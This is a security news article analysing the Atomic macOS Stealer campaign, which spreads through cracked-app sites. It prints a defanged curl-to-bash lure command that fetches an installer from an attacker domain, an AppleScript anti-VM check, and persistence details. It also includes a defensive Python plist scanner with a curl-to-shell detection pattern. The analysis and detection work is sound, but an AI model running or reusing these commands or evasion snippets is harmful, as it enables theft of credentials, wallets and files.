A sophisticated malware campaign targeting macOS users has emerged, exploiting the widespread desire for free software to deliver the notorious Atomic macOS Stealer (AMOS).
This information-stealing malware masquerades as cracked versions of popular applications, tricking unsuspecting users into compromising their own systems while believing they are simply downloading free software alternatives.
The campaign represents a significant shift in the cybersecurity landscape, challenging the long-held perception that macOS devices are inherently safer than their Windows counterparts.
As Apple devices gain popularity among professionals and high-value targets, cybercriminals have adapted their tactics to capitalize on this growing market.
The attackers demonstrate remarkable sophistication by employing multiple distribution methods and continuously rotating their infrastructure to evade detection.
The malware’s reach extends far beyond simple data theft, targeting sensitive information including browser credentials, cryptocurrency wallets, Telegram conversations, VPN configurations, keychain data, Apple Notes, and various document files.
This comprehensive approach to data collection makes AMOS particularly dangerous for both individual users and enterprise environments, where compromised credentials can lead to broader organizational breaches.
Trend Micro researchers identified this campaign through their Managed Detection and Response services, noting the malware’s ability to bypass traditional security measures through social engineering rather than technical exploits.
The analysis revealed that attackers primarily distribute AMOS through websites like haxmac.cc, which hosts numerous cracked macOS applications and serves as the initial infection vector.
The distribution strategy involves redirecting users through a complex network of rotating domains including dtxxbz1jq070725p93[.]cfd, goipbp9080425d4[.]cfd, and im9ov070725iqu[.]cfd.
These redirectors eventually lead victims to landing pages hosted on domains such as ekochist.com, misshon.com, and toutentris.com, where they encounter two primary installation methods.
Terminal-Based Installation and Persistence Mechanisms
The most successful distribution method involves instructing users to execute malicious commands directly in the macOS Terminal application.
This approach proves particularly effective because it sidesteps Apple’s Gatekeeper checks: Gatekeeper inspects downloaded, quarantined applications before they run, but a script fetched with curl and piped straight into a shell never passes through that check.
Users are presented with seemingly innocuous commands like:

```
curl -fsSL https[:]//goatramz[.]com/get4/install[.]sh | bash
```
Once executed, this command downloads and runs an installation script that performs several critical operations.
The script first downloads an AppleScript file named “update” to the temporary directory, which then conducts anti-virtualization checks to avoid detection in sandboxed environments:

```applescript
set memData to do shell script "system_profiler SPMemoryDataType"
if memData contains "QEMU" or memData contains "VMware" then
    set exitCode to 100
else
    set exitCode to 0
end if
```
The malware establishes persistence through a multi-component system involving three key files. The primary stealer binary (.helper) performs the actual data collection, while a monitoring script (.agent) runs continuously to detect user login sessions.
A LaunchDaemon configuration file (com.finder.helper.plist) ensures the malware survives system reboots by automatically launching the monitoring script at startup.
The persistence mechanism creates an infinite loop where the .agent script continuously monitors for active user sessions and executes the .helper binary in the appropriate user context.
This design ensures consistent operation while maintaining a low profile, as the malware operates through legitimate system processes and avoids creating obvious indicators of compromise.
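As an added defender’s example (not code from the Trend Micro write-up), the routine below triages launchd plists for the traits described above: the reported com.finder.helper label, a program path that is a hidden dotfile, a program living in a temporary or world-writable directory, and a curl-to-shell pipe. The sample plist, its /Users/Shared path and the directory list are constructed assumptions, not indicators from the report.

```python
import os
import re
import plistlib

# Constructed sample plist modelled on the described persistence: the
# reported label launching a hidden ".agent" script at boot. The path is assumed.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.finder.helper</string>
  <key>ProgramArguments</key>
  <array><string>/bin/bash</string><string>/Users/Shared/.agent</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
</plist>
"""

KNOWN_LABELS = {"com.finder.helper"}  # label named in the report
# Locations where a legitimate daemon's program rarely lives (assumed heuristic).
SUSPICIOUS_DIRS = re.compile(r"^(/tmp|/private/tmp|/var/folders|/Users/Shared)/")


def triage_launchd_plist(data: bytes) -> list[str]:
    """Return the reasons a launchd plist looks suspicious; empty list means clean."""
    reasons = []
    try:
        plist = plistlib.loads(data)
    except Exception:  # malformed XML/binary plist is itself worth a look
        return ["unparseable plist"]
    label = plist.get("Label", "")
    if label in KNOWN_LABELS:
        reasons.append(f"label matches known IoC: {label}")
    args = plist.get("ProgramArguments") or [plist.get("Program", "")]
    for arg in (a for a in args if isinstance(a, str)):
        base = os.path.basename(arg)
        if len(base) > 1 and base.startswith("."):
            reasons.append(f"launches hidden dotfile: {arg}")
        if SUSPICIOUS_DIRS.match(arg):
            reasons.append(f"program in temp/world-writable location: {arg}")
        if re.search(r"curl\s.*\|\s*(ba)?sh", arg):
            reasons.append("pipes curl output into a shell")
    if reasons and plist.get("RunAtLoad") and plist.get("KeepAlive"):
        reasons.append("RunAtLoad+KeepAlive: relaunched at boot and when killed")
    return reasons


def scan_directory(path: str) -> dict[str, list[str]]:
    """Triage every .plist in a directory such as /Library/LaunchDaemons."""
    findings = {}
    for name in sorted(os.listdir(path)):
        if name.endswith(".plist"):
            with open(os.path.join(path, name), "rb") as fh:
                reasons = triage_launchd_plist(fh.read())
            if reasons:
                findings[name] = reasons
    return findings
```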
Data exfiltration occurs through compressed ZIP archives sent via HTTP POST requests to command-and-control servers, with custom headers containing unique identifiers for each infected system.
The malware’s comprehensive data collection capabilities, combined with its sophisticated evasion and persistence mechanisms, make it a formidable threat to macOS users who download software from untrusted sources.